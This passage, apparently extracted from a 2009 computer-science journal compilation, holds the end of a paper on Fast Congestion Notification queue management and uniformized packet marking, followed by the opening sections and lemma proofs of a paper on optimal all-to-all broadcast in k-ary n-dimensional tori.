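        # gentle RED: pb climbs linearly from max_p to 1 on [max_th, 2*max_th]
        return max_p + (1 - max_p) * (avg - max_th) / max_th
    return 1.0

def red_pa(pb, count):
    """Actual probability pa of Eq. (3); count packets since the last mark."""
    return 1.0 if count * pb >= 1 else pb / (1 - count * pb)
```

With, say, minth = 5, maxth = 15 and maxp = 0.1, an average queue of 10 gives pb = 0.05, and after 10 accepted packets pa rises to 0.1, spacing marks out over time.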
Figure 1. The packet dropping probability (pb) in RED as a function of the average queue size (maxp = 10%)
By marking/dropping packets before the buffer overflows,
RED attempts to notify some connections of incipient
congestion. The responsive ones will limit their sending rates and eventually the network load will decrease. The
unresponsive connections will not slow down, but will
continue at the same pace or even increase their sending rates.
In this case, the unresponsive flows will have more packets
reaching the router, effectively providing more candidates for
dropping than responsive ones.
B. Fast Congestion Notification (FN)
The Fast Congestion Notification (FN) [7] queue management algorithm randomly marks (if ECN) / drops (if non-ECN) arriving packets before the buffer overflows, to effectively control:
The instantaneous queue length, keeping it below the optimal queue length to reduce queuing delay and avoid buffer overflows.
The average traffic arrival rate of the queue, keeping it in the proximity of the departing link capacity to enable congestion and queue-length control.
FN integrates the instantaneous queue length and the average arrival rate of the queue to compute the mark/drop
probability of the packet upon each arriving packet. The use of
the instantaneous queue length in conjunction with the average
queue speed (average arrival rate) can provide superior control
decision criteria for an active queue management scheme [8].
The FN linear mark/drop probability function [9] is derived
based on the assumption that the arrival traffic process
remains unchanged over the control time constant period of
length (T) seconds. In other words, it is supposed that, immediately following the packet's arrival, the traffic
continues to arrive at the fixed rate of (R) bits/sec, the
estimated average arrival rate to the buffer computed upon the
packet's arrival, for the period of the control time constant.
The buffer has a capacity of (C ) bits and is served by an
outgoing link at a fixed rate of ( µ) bits/sec. The packet
mark/drop probability (P), is computed for, and applied to,
every incoming packet, based on the above assumptions, with
the goal of driving the instantaneous (current) queue length
(Qcur ) to some desired optimal level (Qopt ) over the control
time constant period (T ). These are shown in figure 2. The FN
mark/drop probability, P, is calculated by
P = ((R - µ)·T + (Qcur - Qopt)) / (R·T)    (4)
Figure 2. FN Gateway Buffer
III. UNIFORMIZATION OF PACKET MARKS/DROPS
An attractive property of RED resulting from using the
count variable is that the number of accepted packets
between two packet marks/drops is uniformly distributed
[1]. By having a uniform distribution, packet marks/drops are
not clustered, avoiding again possible synchronization of
TCP sources. Although quantitative benefits of having a uniform distribution have not, to the best of our knowledge, been reported in the literature, it is commonly admitted that light-tailed distributions (such as the uniform distribution) give better performance in terms of efficiency and fairness [5].
As in RED, FN marks/drops packets at fairly regular intervals. The FN uniformization technique enforces packet marks/drops at evenly spaced intervals, avoiding, under steady-state conditions at the gateway, both long periods of time in which no packets are marked or dropped and clustered packet marks/drops. Very long packet marking/dropping intervals can contribute to large queue sizes and congestion. Multiple successive packet marks/drops can result in the global synchronization problem.
To compute the initial marking/dropping probability, FN
uses the average traffic arrival rate and the instantaneous
queue size by
Pini = ((R - µ)·T + (Qcur - Qopt)) / (R·T)    (5)
The initial marking/dropping probability is used along with the number of accepted packets between two packet
marks/drops (count ) by the uniformization function to
calculate the final packet marking/ dropping probability as
follows:
Pfin = Pini / (2 - count·Pini)   if count·Pini < 2
Pfin = 1                         otherwise    (6)
Figure 3. FN Uniformization Function: Pfin = Pini / (2 - count·Pini)
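The uniformization function of Eq. (6) can be sketched and checked numerically (the function names are ours, and we assume the Pfin = Pini/(2 - count·Pini) reading of the formula): applying Pfin to each arrival makes every interval length up to 2/Pini equally likely, with mass Pini/2, matching the uniform law the paper derives later.

```python
def p_fin(p_ini, count):
    """Eq. (6): final marking probability; forced to 1 once count*p_ini
    reaches 2, guaranteeing a mark/drop after finitely many acceptances."""
    if count * p_ini < 2:
        return p_ini / (2 - count * p_ini)
    return 1.0

def interval_pmf(p_ini, n):
    """Probability that the n-th arrival after a mark is the next one marked,
    when each arrival is marked with probability p_fin(p_ini, count)."""
    survive = 1.0
    for count in range(n - 1):
        survive *= 1.0 - p_fin(p_ini, count)
    return survive * p_fin(p_ini, n - 1)
```

For Pini = 0.1, interval_pmf returns 0.05 for every n from 1 to 20 and essentially 0 afterwards: the telescoping product (2 - count·Pini)/2 cancels the growing per-packet probability, leaving a flat Pini/2.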
Figure 3 shows that the FN uniformization function
increases the value of the initial marking/dropping
probability proportional to the number of the accepted
packets (count ) since the last marking/dropping. When count
increases, the final marking/dropping probability P fin will
rise until it finally reaches 1. This means that even if the
conditions at the gateway are such that P remains
comparatively constant, the uniformization technique directs
the marking/dropping probability towards 1, ensuring that
after some number of accepted packets, the
marking/dropping probability will reach 1, performing a
packet marking/dropping operation. This avoids long
intermarking intervals, which helps in controlling the gateway queue size effectively and preventing congestion. From
marking/dropping probability, the smaller is the number of
accepted packets required to direct the marking/dropping
probability to 1 and hence, the less the delay before a
packet mark/drop operation is activated. This is logical, because a larger initial marking/dropping probability warns of the onset of congestion in the near future, and therefore the
uniformization process performs a packet mark/drop
immediately, and thus, the sources are notified about the
congestion early. In case count·P ≥ 2, the final packet mark/drop probability is set to 1. This is logical because 2 - count·P ≤ 0 only happens when either the number of accepted packets (count) or the initial mark/drop probability P, or both, are comparatively large. A large value of count signifies that a long period of time has passed since the last packet was marked or dropped. A large value of P signifies a serious deficiency of resources at the gateway caused by congestion. In both cases, it is required to perform a packet mark/drop operation immediately. The expected packet marking/dropping time (E(Tm)) is used to show how the uniformization process reduces clustered packet marks/drops. For a predetermined initial packet marking/dropping probability Pini, if Pini is applied immediately to the arriving packets, the packet marking/dropping time (Tm), defined as the number of accepted packets between two successive marked/dropped packets, is geometrically distributed with parameter Pini, for which
p(Tm = n) = (1 - Pini)^(n-1) · Pini    (7)
and E (T m) = 1/ Pini [1]. Nevertheless, if the final
marking/dropping probability P fin is applied to the arriving
packets, the packet intermarking interval (Tm) will be
uniformly distributed with
p(Tm = n) = Pini / 2   if 1 ≤ n ≤ 2/Pini
p(Tm = n) = 0          otherwise    (8)
and E (T m) = (1/ Pini) + (1/2). Figure 4 shows the expected
packet marking/dropping intervals for the geometric
distribution and uniform distribution cases.
Figure 4. Expected Packet Marking/Dropping Times – Uniform Distribution: (1/Pini) + (1/2); Geometric Distribution: 1/Pini
From Figure 4, it is noticeable that both curves become
almost parallel as Pini goes toward 1. Figure 4 verifies that for
a predetermined marking/dropping probability Pini, the
expected packet marking/dropping time is smaller for the
geometrically distributed case compared to the uniform one.
The increase in the packet marking/dropping interval is
more significant for larger values of the marking/dropping
probability Pini. This indicates that the uniformization
procedure increases the small expected packet
marking/dropping times, as a result of large initial packet
marking/dropping probabilities, ensuring that clustered packet
marks/drops are minimized.
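The two expectations compared in Figure 4 can be recomputed directly from the laws of Eqs. (7) and (8) (the function names and the truncation bound are our own):

```python
def expected_interval_geometric(p_ini, n_max=10000):
    """E(Tm) under the geometric law of Eq. (7); converges to 1/p_ini."""
    return sum(n * (1 - p_ini) ** (n - 1) * p_ini for n in range(1, n_max + 1))

def expected_interval_uniform(p_ini):
    """E(Tm) under the uniform law of Eq. (8): equals (1/p_ini) + (1/2)."""
    m = int(round(2 / p_ini))
    return sum(n * (p_ini / 2) for n in range(1, m + 1))
```

For Pini = 0.1 these give 10 and 10.5 respectively, i.e., uniformization lengthens the expected intermarking time by exactly half a packet, with the relative difference shrinking as Pini approaches 1, as Figure 4 shows.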
IV. CONCLUSION
This paper shows how the FN uniformization process of packet intermarking intervals ensures packet marks/drops at fairly regular intervals. Avoiding large intermarking intervals helps control congestion by sending congestion notification signals to traffic sources in moderation on a regular basis, while avoiding small intermarking intervals helps minimize clustered packet marks/drops and global synchronization.
REFERENCES
[1] S. Floyd and V. Jacobson, "Random early detection gateways for congestion avoidance," IEEE/ACM Transactions on Networking, vol. 1, pp. 397-413, 1993.
[2] S. Leonardo, P. Adriano, and M. Wagner, Jr., "Reactivity-based Scheduling Approaches for Internet Services," in Proceedings of the Fourth Latin American Web Congress, IEEE Computer Society, 2006.
[3] L. Xue and H. Wenbo, "Active queue management design using discrete-event control," in Decision and Control, 2007. 46th IEEE Conference on, 2007, pp. 3806-3811.
[4] M. Christiansen, K. Jeffay, D. Ott, and F. D. Smith, "Tuning RED for Web traffic," IEEE/ACM Transactions on Networking, vol. 9, pp. 249-264, 2001.
[5] S. De Cnodder, O. Elloumi, and K. Pauwels, "RED behavior with different packet sizes," in Computers and Communications, 2000. Proceedings. ISCC 2000. Fifth IEEE Symposium on, 2000, pp. 793-799.
[6] S. Floyd, "Recommendation on using the "gentle" variant of RED," 2000, http://www.icir.org/floyd/red/gentle.html.
[7] M. M. Kadhum and S. Hassan, "Fast Congestion Notification mechanism for ECN-capable routers," in Information Technology, 2008. ITSim 2008. International Symposium on, 2008, pp. 1-6.
[8] M. M. Kadhum and S. Hassan, "The Design Motivations and Objectives for Fast Congestion Notification (FN)," in Proceedings of the APAN Network Research Workshop, Malaysia, 2009.
[9] M. M. Kadhum and S. Hassan, "A Linear Packet Marking Probability Function for Fast Congestion Notification (FN)," International Journal of Computer Science and Network Security, vol. 9, pp. 45-50, 2009.
AUTHORS PROFILE
Mohammed M. Kadhum is a lecturer in the Graduate Department of Computer Science, Universiti Utara Malaysia (UUM), and is currently attached to the InterNetWorks Research Group at the UUM College of Arts and Sciences as a doctoral researcher. He is currently pursuing his PhD research in computer networking. His current research interest is Internet congestion. He has been awarded several medals for his outstanding research projects. His professional activity includes serving as Technical Program Chair for the International Conference on Network
Applications, Protocols and Services 2008 (NetApps2008), which has been
held successfully at Universiti Utara Malaysia. To date, he has published various papers, including in well-known and influential international journals.
Associate Professor Dr. Suhaidi Hassan is currently the Assistant Vice Chancellor of the College of Arts and Sciences, Universiti Utara Malaysia (UUM). He is an associate professor in Computer Systems and Communication Networks and the former Dean of the Faculty of Information Technology, Universiti Utara Malaysia.
Dr. Suhaidi Hassan received his BSc degree in Computer Science from Binghamton University, New York (USA) and his MS degree in Information Science (concentration in Telecommunications and Networks) from the University of Pittsburgh, Pennsylvania (USA). He received his PhD degree in Computing (focusing on Networks Performance Engineering) from the University of Leeds in the United Kingdom.
In 2006, he established the ITU-UUM Asia Pacific Centre of Excellence (ASP CoE) for Rural ICT Development, a human resource development initiative of the Geneva-based International Telecommunication Union (ITU) which serves as the focal point for all rural ICT development initiatives across the Asia Pacific region by providing executive training programs, knowledge repositories, R&D and consultancy activities.
Dr. Suhaidi Hassan is a senior member of the Institute of Electrical and Electronic Engineers (IEEE), in which he is actively involved in both the IEEE Communications and IEEE Computer societies. He has served as the Vice Chair (2003-2007) of the IEEE Malaysia Computer Society. He also serves on a technical committee for the Malaysian Research and Educational Network (MYREN) and as a Council Member of the Cisco Malaysia Network Academy.
On The Optimality Of All-To-All Broadcast In k-ary n-dimensional Tori
Jean-Pierre Jung1, Ibrahima Sakho2
UFR MIM, Université de Metz
Ile du Saulcy BP 80794 - 57012 Metz Cedex 01 – France
1jpjung@univ-metz.fr, 2sakho@univ-metz.fr
Abstract — All-to-all broadcast is a collective communication in a network in which every node must send a certain piece of its data to every other node. This paper addresses the problem of optimal all-port all-to-all broadcast in multidimensional tori. The optimality criteria considered are the minimum number of exchange steps, no duplicated data in the sense that only new data are conveyed to receivers, and the balance of the communication link loads. It is proved that, under these constraints, an optimal broadcast is not feasible in every multidimensional torus. The tori which are capable of optimal broadcasts are then characterized.
Keywords-MIMD computers; distributed memory; interconnection network; multidimensional torus; all-to-all broadcast; NODUP; store-and-forward routing; message combining; ε-optimality.
I. INTRODUCTION
Parallel computers with distributed memory constitute an attractive alternative in the search for scalable architectures for massively parallel applications. Given the processor interconnection network (IN for short) of such computers, inter-processor communications (IPC for short) are realized by passing messages. Intensive IPC can then rapidly result in a bottleneck for the IN. In order to ensure efficient IPC, several INs have been proposed in the literature. Among them, cartesian product graphs, which generalize multidimensional meshes and tori, are the most popular.
Among the communication patterns that induce intensive IPC, collective communication as defined in [1], [2] has received considerable attention. Collective communication is a communication pattern in which a group of processors has to exchange data. A commonly used form of collective communication is the one where the group consists of all the processors. Examples of such communication are all-to-all personalized communication [3], [4] and all-to-all broadcast [5], [6]. While in all-to-all personalized communication each node has to send a distinct message to every other node, in all-to-all broadcast each node has to send the same message to all other nodes. They are undoubtedly the most demanding of IN bandwidth and hence of execution time.
All-to-all broadcast is important in numerous applications that include protocols required for the control of distributed execution and intensive computation. Examples of such protocols are decentralised consensus [7], coordination of distributed checkpoints [8] and acquisition of a new global state of a system [9]. Examples of intensive computation are sorting [10] and ordinary differential equation solving [11].
Performance models of all-to-all broadcast are generally based on parameters such as the number of data exchange steps, the size of data exchanged at each step, and the so-called NODUP constraint of [19], which imposes the absence of redundancy, that is, every data item conveys only new information to its receiver.
It is obvious that not every k-ary n-dimensional torus can realise an optimal all-to-all broadcast under all these constraints. The aim of this paper is then to characterize the k-ary n-dimensional tori capable of realising such optimal all-to-all broadcasts.
The remainder of the paper is organized in five sections. Section II presents the related works and Section III the context of the study. Section IV presents the mathematical properties used in the subsequent sections to characterize k-ary n-dimensional tori suitable for optimal all-to-all broadcast, and Section V the characterization of such tori. Section VI concludes the paper and presents perspectives for future work.
II. RELATED WORKS
Beyond the works cited in Section I, several studies have been conducted to devise efficient all-to-all broadcast algorithms for multidimensional meshes and tori. They can be classified into two main classes: the direct algorithms, like those in [12] and [13], and the message combining algorithms, like those in [14], [15] and [16].
Direct algorithms aim at minimising the number of data exchange steps and therefore suppose that every pair of processors can directly exchange data. They thus do not take into account the distance between processors.
Message combining algorithms are more realistic. They aim at minimising the size of the data exchanged at each step. Data destined for a processor are combined over successive exchange steps, resulting in longer data and a reduced start-up cost.
Beyond these algorithms, there are others based on data pipelining techniques, as described in [17] and [18].
In [20], the more general problem of methodologies for devising optimal all-to-all algorithms is addressed; an optimal all-to-all broadcast algorithm is proposed for k-ary 2-dimensional tori. The constraints of such a broadcast are:
- to route data on the shortest paths,
- to balance the link loads,
- to receive each data piece once and only once.
III. PROBLEM DESCRIPTION
This section deals with the formulation of the optimal all-to-all broadcast problem. Definitions and properties of multidimensional tori which are essential for this formulation will be given.
A. Definitions
1) k-ary n-dimensional torus: A k-ary n-dimensional torus is a network of k^n nodes x(x1, x2, …, xi, ..., xn) such that 0 ≤ xi ≤ k-1, where two nodes are connected if and only if their addresses differ by 1 [modulo k] on one and only one digit.
More formally, it is a cartesian product of n rings of k nodes each. Fig. 1 illustrates a bidirectional 5-ary 3-dimensional torus.
Fig. 1. Bidirectional 5-ary 3-dimensional torus
2) All-to-all broadcast: An all-to-all broadcast is a type of global communication in which each node has to broadcast the same atomic data to the other nodes.
At the end of such a communication, each node must be in possession of the data sent by all the nodes in the network.
Let T be the all-to-all broadcast time function.
3) Optimal all-to-all broadcast: An optimal all-to-all broadcast is one realized within the shortest time. More formally, an all-to-all broadcast A* is optimal if and only if T(A*) ≤ T(A) for any all-to-all broadcast A.
4) ε-optimal all-to-all broadcast: An ε-optimal all-to-all broadcast is one realized within the shortest realisable time. More formally, an all-to-all broadcast A* is ε-optimal if and only if T(A*) < T(A) + ε for any all-to-all broadcast A.
B. Properties of k-ary n-cube tori
The following properties come from the structure of thetorus.
Property 1: Let d(x, y) be the distance between two nodes x and y. Then d(x, y) = Σ1≤i≤n min(|xi - yi|, k - |xi - yi|).
Property 2: The diameter of a k-ary n-dimensional torus is equal to n⌊k/2⌋, where ⌊r⌋ stands for the floor of r.
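The two properties above are easy to check by brute force on small tori; the following sketch (function names are ours) computes the distance of Property 1 and verifies the n⌊k/2⌋ diameter of Property 2:

```python
from itertools import product

def torus_distance(x, y, k):
    """Property 1: shortest way around each ring, summed over dimensions."""
    return sum(min(abs(a - b), k - abs(a - b)) for a, b in zip(x, y))

def diameter(n, k):
    """Eccentricity of the node 0...0 by exhaustive search; this equals the
    diameter since the torus looks the same from every node."""
    origin = (0,) * n
    return max(torus_distance(origin, x, k) for x in product(range(k), repeat=n))
```

For instance, diameter(2, 5) gives 4 = 2·⌊5/2⌋ and diameter(3, 4) gives 6 = 3·⌊4/2⌋, in agreement with Property 2.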
From Definitions 2-4, we can deduce the following characterization of optimal broadcasts.
Proposition 1: A necessary and sufficient condition for an all-to-all broadcast to be optimal is that:
a) each piece of data is received once and only once by each node,
b) data are routed on the shortest paths,
c) link loads are balanced.
Proof: The proof of sufficiency is straightforward. Indeed, when conditions a), b) and c) are all verified, the broadcast task is well balanced between all the nodes, so they all begin and end at the same time. Furthermore, each node does only what is necessary. To prove necessity, suppose that exactly one of the conditions a), b) and c) is not verified.
• Condition a) is not verified. Necessarily, at some step, at least one node receives data of which one piece is redundant. One of the useful pieces of data which should have been received instead of the redundant one has necessarily been sent by another node. Thus there is a node which, at this step, has sent a larger piece of data, which requires more time.
• Condition b) is not verified. Then more time is required to convey the data to their destination.
• Condition c) is not verified. Then overloaded links will take more time to transfer their data.
In any case, the data transfer requires more time; the resulting broadcast cannot be optimal. At best, it is ε-optimal.
We can deduce from this proposition that in an optimal all-to-all broadcast, the number of data exchange steps between adjacent nodes has to be equal to the diameter of the torus, at each step the amount of data to exchange has to be the same on each link, and the data must be routed on the shortest paths.
IV. MATHEMATICAL FOUNDATIONS
This section presents the mathematical properties used in the next sections to devise the conditions under which optimal all-to-all broadcast can be performed on a k-ary n-dimensional torus.
(IJCSIS) International Journal of Computer Science and Information Security,
Vol. 4 , No. 1 & 2, 2009
8/14/2019 International Journal of computer science and Information Security
http://slidepdf.com/reader/full/international-journal-of-computer-science-and-information-security 173/215
A. Definitions
In the remainder of the paper, we will use the following equivalent definition of a k-ary n-dimensional torus instead of the one given in the previous section.
1) k-ary n-dimensional torus: Equivalently to the previous definition, a k-ary n-dimensional torus can also be viewed as a network of k^n nodes x(x1, x2, …, xi, ..., xn) such that -⌊k/2⌋ ≤ xi ≤ ⌊k/2⌋, where two nodes are connected if and only if their addresses differ by 1 [modulo k] on one and only one digit.
2) The reference node: A reference node of a k-ary n-dimensional torus is a node from which the topological view of the torus is identical to the view from any other node.
By definition of the k-ary n-dimensional torus, it is obvious that any node can be the reference node. In the sequel, this will be the node which has all its coordinates equal to 0. It will be distinguished, as illustrated in Fig. 2, by a small black square.
3) Boundary node: A boundary node of a k-ary n-dimensional torus is a node which, observed from the reference node, possesses a wraparound link.
4) Quadrant: A quadrant of a k-ary n-dimensional torus is a set of nodes whose coordinates have, in each dimension, a fixed sign (non-negative or non-positive).
For instance, in the k-ary 2-dimensional torus of Fig. 2 there are four quadrants, one of which, the North-West quadrant, is constituted of the nodes x(x1, x2) such that x1 ≤ 0 and x2 ≥ 0.
Fig. 2. 5-ary 2-dimensional torus
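The adjacency condition of definition 1) can be checked mechanically. The following predicate is an illustrative sketch (not from the paper), using the coordinate representatives -⌊k/2⌋ ≤ x_i ≤ ⌊k/2⌋:

```python
def adjacent(x, y, k):
    """Nodes of a k-ary n-dimensional torus are adjacent iff their
    addresses differ by 1 (modulo k) on one and only one digit."""
    diffs = [(a - b) % k for a, b in zip(x, y)]
    nonzero = [d for d in diffs if d != 0]
    return len(nonzero) == 1 and nonzero[0] in (1, k - 1)

# In the 5-ary 2-dimensional torus of Fig. 2, the wraparound links make
# (-2, 0) and (2, 0) adjacent, while (0, 0) and (1, 1) are not.
print(adjacent((-2, 0), (2, 0), 5), adjacent((0, 0), (1, 1), 5))  # -> True False
```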
B. Properties
Let:
C(m,p) be the number of combinations of p elements among m,
exp(q,m) be the exponent of the prime factor q in the decomposition of m,
M(p,v)(n,k,t) be the cardinality of the set of the nodes of a k-ary n-dimensional torus located at distance t from the reference node and having exactly p of their coordinates equal to v.
Proposition 2: Let I_{n,p} be the set of the subsets of cardinality p of the n first non-null natural integers. Then:

M(p,v)(n,k,t) = G(p,v)(n,k) * C(n,p) * N(p,v)(n,k,t)

where:

G(p,v)(n,k) = 2^(n-p) if v = 0, and 2^n otherwise, if k is odd;
G(p,v)(n,k) = 1 if v = 0, and 2^p otherwise, if k is even;

N(p,v)(n,k,t) = |{x : x_i ≥ 0 and Σ_{i∉I} x_i = t - pv}| if k is odd,
N(p,v)(n,k,t) = Σ_{0≤h≤n-p} 2^(n-p-h) * |{x : x_i ≥ 0 and Σ_{i∉I} x_i = t - pv - hk/2}| otherwise.
Proof: By definition,

M(p,v)(n,k,t) = |∪_{I∈I_{n,p}} {x : |x_i| ≤ k/2, Σ_{1≤i≤n} |x_i| = t and |x_i| = v if i∈I}|
= Σ_{I∈I_{n,p}} |{x : Σ_{i∉I} |x_i| = t - pv}|.

Let Q be the set of quadrants of the k-ary n-dimensional torus according to the reference node. Then:

M(p,v)(n,k,t) = Σ_{I∈I_{n,p}} Σ_{Q∈Q} |{x∈Q : Σ_{i∉I} |x_i| = t - pv}|
= |I_{n,p}| * Σ_{Q∈Q} |{x∈Q : Σ_{i∉I} |x_i| = t - pv}|
= C(n,p) * Σ_{Q∈Q} |{x∈Q : Σ_{i∉I} |x_i| = t - pv}|.

Two situations may arise according to the parity of k.

Case 1: k is odd. As illustrated in Fig. 2, all the quadrants are structurally identical, so it is sufficient to reason on one of them. Let us consider, for instance, the quadrant:

Q = {x : x_i = v if i∈I and x_i ≥ 0 otherwise}.

Then:

Σ_{Q∈Q} |{x∈Q : Σ_{i∉I} |x_i| = t - pv}| = |Q| * |{x∈Q : Σ_{i∉I} |x_i| = t - pv}|

and therefore:

M(p,v)(n,k,t) = C(n,p) * G(p,v)(n,k) * N(p,v)(n,k,t)

with:

G(p,v)(n,k) = 2^(n-p) if v = 0, and 2^n otherwise,
N(p,v)(n,k,t) = |{x : x_i ≥ 0 and Σ_{i∉I} x_i = t - pv}|.

Case 2: k is even. Again:

M(p,v)(n,k,t) = C(n,p) * Σ_{Q∈Q} |{x∈Q : Σ_{i∉I} |x_i| = t - pv}|.

However, the quadrants are no longer structurally identical: they do not have the same number of boundary nodes, as illustrated in Fig. 3 for the 4-ary 2-dimensional torus.

Fig. 3. 4-ary 2-dimensional torus

Then, partitioning according to the set of the nodes x having h coordinates x_i, for i∉I, equal to k/2:

M(p,v)(n,k,t) = C(n,p) * Σ_{0≤h≤n} |{x : Σ_{i∉I} |x_i| = t - pv - hk/2}|.

Let us embed the k-ary n-dimensional torus in a (k+1)-ary n-dimensional torus. As illustrated in Fig. 4, the quadrants become structurally identical, but with each boundary node appearing redundantly 2^h times for 0 ≤ h ≤ n-p.

Fig. 4. 4-ary 2-dimensional torus embedded in a 5-ary 2-dimensional torus

Redundant boundary nodes are illustrated in Fig. 4 by the white East (resp. South) boundary nodes, which are duplicates of the black West (resp. North) boundary nodes, while their induced redundant links are illustrated by the dotted links.

Then, from the odd-arity case:

M(p,v)(n,k,t) = C(n,p) * Σ_{0≤h≤n-p} (G'(p,v)(n,k) / 2^h) * |{x : x_i ≥ 0 and Σ_{i∉I} x_i = t - pv - hk/2}|
= C(n,p) * (G'(p,v)(n,k) / 2^(n-p)) * N(p,v)(n,k,t),

from where the expected results, with G'(p,v)(n,k) = G(p,v)(n,2k'+1):

N(p,v)(n,k,t) = Σ_{0≤h≤n-p} 2^(n-p-h) * |{x : x_i ≥ 0 and Σ_{i∉I} x_i = t - pv - hk/2}|.
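For small odd-arity tori, the quantity M(p,v)(n,k,t) can also be obtained by brute-force enumeration directly from its definition. The sketch below is illustrative (not part of the paper) and enumerates the coordinate representatives -(k-1)/2 ... (k-1)/2:

```python
from itertools import product

def M_brute(p, v, n, k, t):
    """Count the nodes of a k-ary n-dimensional torus (k odd) located at
    distance t from the reference node and having exactly p coordinates
    of absolute value v."""
    r = (k - 1) // 2
    return sum(
        1
        for x in product(range(-r, r + 1), repeat=n)
        if sum(abs(c) for c in x) == t and sum(abs(c) == v for c in x) == p
    )

# 5-ary 2-dimensional torus of Fig. 2: the 2n = 4 distance-1 nodes each
# have exactly one coordinate equal to 0.
print(M_brute(1, 0, 2, 5, 1))  # -> 4
```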
Let (s_r, r ≥ 0) be the recursive sequence whose general term is defined as:

s_r = 1 if r = 0,
s_r = (s_{r-1})^(q-1) σ_{r-1} otherwise,

where (s_{r-1})^(q-1) stands for (q-1) repetitions of the terms of s_{r-1} and σ_{r-1} stands for the sequence s_{r-1} whose last term is incremented by 1. For instance, for q = 3 and r = 3 we obtain:

s0 = 1
s1 = 1 1 2
s2 = 1 1 2 1 1 2 1 1 3
s3 = 1 1 2 1 1 2 1 1 3 1 1 2 1 1 2 1 1 3 1 1 2 1 1 2 1 1 4
Let s_r(m) be the m-th term of the sequence s_r and m_i the i-th digit of m in base q.

Lemma 1: Σ_{1≤i≤m} s_r(i) = Σ_{0≤i≤log m} ⌊m/q^i⌋.

Proof: We know from the decomposition of an integer in base q that m = Σ_{0≤i≤log m} m_i q^i. Consequently, in accordance with the recursive nature of the sequence s_r and the fact that m_i < q, it follows that:

Σ_{1≤i≤m} s_r(i) = Σ_{0≤i≤log m} m_i Σ_{1≤j≤q^i} s_i(j).

From the definition of s_i, we know that:

Σ_{1≤j≤q^i} s_i(j) = (q-1) * Σ_{1≤j≤q^(i-1)} s_{i-1}(j) + Σ_{1≤j≤q^(i-1)} σ_{i-1}(j)
= (q-1) * Σ_{1≤j≤q^(i-1)} s_{i-1}(j) + Σ_{1≤j≤q^(i-1)} s_{i-1}(j) + 1
= q * Σ_{1≤j≤q^(i-1)} s_{i-1}(j) + 1.

By iteration, using similar reasoning, we obtain:

Σ_{1≤j≤q^i} s_i(j) = q^2 * Σ_{1≤j≤q^(i-2)} s_{i-2}(j) + q + 1 = Σ_{0≤j≤i} q^j.

Therefore:

Σ_{1≤i≤m} s_r(i) = Σ_{0≤i≤log m} m_i Σ_{0≤j≤i} q^j.

Let us consider the following triangular matrix organisation of the terms of the second member:

i = 0:      m_0
i = 1:      m_1    m_1 q
i = 2:      m_2    m_2 q    m_2 q^2
...
i = log m:  m_{log m}    m_{log m} q    m_{log m} q^2    ...    m_{log m} q^{log m}

Summing the terms on the same diagonal we obtain:

Σ_{i≤j≤log m} m_j q^(j-i) = ⌊(Σ_{0≤j≤log m} m_j q^j) / q^i⌋ = ⌊m/q^i⌋,

from where:

Σ_{1≤i≤m} s_r(i) = Σ_{0≤i≤log m} ⌊m/q^i⌋.
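Lemma 1 can be checked numerically. The sketch below (illustrative, not from the paper) builds s_r from its recursive definition and compares every prefix sum with the right-hand side:

```python
def s(r, q):
    """Sequence s_r: s_0 = (1,); s_r is (q-1) copies of s_{r-1}
    followed by s_{r-1} with its last term incremented by 1."""
    seq = [1]
    for _ in range(r):
        seq = seq * (q - 1) + seq[:-1] + [seq[-1] + 1]
    return seq

def rhs(m, q):
    """Sum of floor(m / q^i) for 0 <= i <= log_q(m)."""
    total, power = 0, 1
    while power <= m:
        total += m // power
        power *= q
    return total

q, r = 3, 3
seq = s(r, q)
assert seq[:9] == [1, 1, 2, 1, 1, 2, 1, 1, 3]   # s_2 as listed in the text
assert all(sum(seq[:m]) == rhs(m, q) for m in range(1, len(seq) + 1))
```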
Lemma 2: exp(q, p!) = Σ_{1≤j≤1+log(p/q)} ⌊p/q^j⌋.

Proof: By definition,

exp(q, p!) = Σ_{1≤m≤p} exp(q, m).

As the only values of m for which exp(q, m) is non-null are the multiples of q, the above relation becomes:

exp(q, p!) = Σ_{1≤j≤⌊p/q⌋} exp(q, j*q)

where:

exp(q, j*q) = 1 if j < q,
exp(q, j*q) = 1 + exp(q, j) if j is a power of q,
exp(q, j*q) = exp(q, j*q mod q^(1+log j)) otherwise.

In other words, the sequence (exp(q, j*q), 1 ≤ j ≤ ⌊p/q⌋) is straightforwardly a subsequence of s_r with r ≥ log⌊p/q⌋. Then, from Lemma 1, it comes that:

exp(q, p!) = Σ_{1≤j≤⌊p/q⌋} s_r(j)
= Σ_{0≤j≤log(p/q)} ⌊⌊p/q⌋ / q^j⌋
= Σ_{0≤j≤log(p/q)} ⌊p/q^(j+1)⌋
= Σ_{1≤j≤1+log(p/q)} ⌊p/q^j⌋.
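Lemma 2 is the classical Legendre formula for the exponent of a prime q in p!. A direct numerical cross-check (an illustrative sketch):

```python
from math import factorial

def exp_in_factorial(q, p):
    """Exponent of the prime q in p!: sum of floor(p / q^j), j >= 1."""
    total, power = 0, q
    while power <= p:
        total += p // power
        power *= q
    return total

def exp_in(q, m):
    """Exponent of q in the decomposition of m (trial division)."""
    e = 0
    while m % q == 0:
        m //= q
        e += 1
    return e

assert all(
    exp_in_factorial(q, p) == exp_in(q, factorial(p))
    for q in (2, 3, 5) for p in range(1, 60)
)
```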
Lemma 3: Let C_p = Σ_{1≤j≤1+log((n-p)/q)} ⌊(n-p)/q^j⌋. Then:

C_p = (1/(q-1)) * ((n-p) - (Σ_{0≤j≤α} n_j - Σ_{0≤j≤β} p_j)) - Card{1≤j≤β : Σ_{0≤i≤j-1} n_i q^i < Σ_{0≤i≤j-1} p_i q^i}.

Proof: Let us consider that:

n = Σ_{0≤i≤α} n_i q^i with α = log_q n,
p = Σ_{0≤i≤β} p_i q^i with β = log_q p.

Then, as n > p:

n - p = Σ_{0≤i≤α} (n_i - p_i) q^i,
⌊(n-p)/q^j⌋ = Σ_{j≤i≤α} (n_i - p_i) q^(i-j) + c_j,

where c_j = -1 if Σ_{0≤i≤j-1} (n_i - p_i) q^i < 0, and c_j = 0 otherwise. Hence:

C_p = Σ_{1≤j≤α} ⌊(n-p)/q^j⌋
= Σ_{1≤j≤α} Σ_{j≤i≤α} (n_i - p_i) q^(i-j) + Σ_{1≤j≤α} c_j
= Σ_{1≤j≤α} Σ_{j≤i≤α} (n_i - p_i) q^(i-j) - Card{1≤j≤β : Σ_{0≤i≤j-1} n_i q^i < Σ_{0≤i≤j-1} p_i q^i}
= Σ_{1≤j≤α} Σ_{j≤i≤α} n_i q^(i-j) - Σ_{1≤j≤β} Σ_{j≤i≤β} p_i q^(i-j) - Card{1≤j≤β : Σ_{0≤i≤j-1} n_i q^i < Σ_{0≤i≤j-1} p_i q^i}.

